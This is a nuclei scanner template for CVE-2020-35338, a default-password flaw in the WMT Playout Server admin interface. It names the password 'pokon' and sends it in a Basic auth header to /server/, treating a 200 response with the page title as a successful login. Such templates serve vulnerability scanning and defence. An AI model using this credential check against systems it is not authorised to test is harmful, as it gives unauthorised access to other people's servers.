nuclei-templates/cves/2020/CVE-2020-35338.yaml

33 lines
929 B
YAML

id: CVE-2020-35338
info:
author: Jeya Seelan
severity: critical
name: Default Credentials of WMT Server
description: The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-35338
- https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa
tags: cve,cve2020,wmt,default-login
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-35338
cwe-id: CWE-798
requests:
- method: GET
path:
- "{{BaseURL}}/server/"
headers:
Authorization: "Basic OnBva29u"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>WMT Server playout"